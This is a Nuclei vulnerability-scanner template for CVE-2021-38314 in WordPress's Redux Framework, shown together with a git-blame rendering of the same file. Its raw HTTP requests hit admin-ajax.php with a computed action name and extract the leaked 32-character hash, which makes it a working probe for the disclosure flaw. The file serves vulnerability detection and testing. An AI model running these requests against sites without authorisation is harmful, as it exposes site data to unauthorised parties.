nuclei-templates/cves/2021/CVE-2021-38314.yaml

id: CVE-2021-38314

info:
  name: Redux Framework - Unauthenticated Sensitive Information Disclosure
  author: meme-lord
  severity: medium
  reference: |
      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314
      - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/
  tags: cve,cve2021,wordpress

requests:
  - raw:
      - |
        GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Connection: close

      - |
        GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept: */*
        Connection: close

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "len(body)<50"

      - type: regex
        name: meme
        regex:
          - '[a-f0-9]{32}'
        part: body
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        regex:
          - "[a-f0-9]{32}"
Update and rename CVE-2021-38314.yml to CVE-2021-38314.yaml 2021-09-16 16:29:41 +00:00			`id: CVE-2021-38314`

Added Redux Framework 2021 CVE 2021-09-16 14:08:12 +00:00			`info:`
Update and rename CVE-2021-38314.yml to CVE-2021-38314.yaml 2021-09-16 16:29:41 +00:00			`name: Redux Framework - Unauthenticated Sensitive Information Disclosure`
Added Redux Framework 2021 CVE 2021-09-16 14:08:12 +00:00			`author: meme-lord`
			`severity: medium`
			`reference: \|`
			`- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314`
			`- https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/`
			`tags: cve,cve2021,wordpress`

			`requests:`
			`- raw:`
			`- \|`
			`GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: /`
			`Connection: close`

			`- \|`
			`GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1`
			`Host: {{Hostname}}`
			`User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0`
			`Accept: /`
			`Connection: close`

			`stop-at-first-match: true`
			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "len(body)<50"`

			`- type: regex`
			`name: meme`
			`regex:`
			`- '[a-f0-9]{32}'`
			`part: body`
			`condition: and`

			`- type: status`
			`status:`
			`- 200`

			`extractors:`
			`- type: regex`
			`part: body`
			`regex:`
			`- "[a-f0-9]{32}"`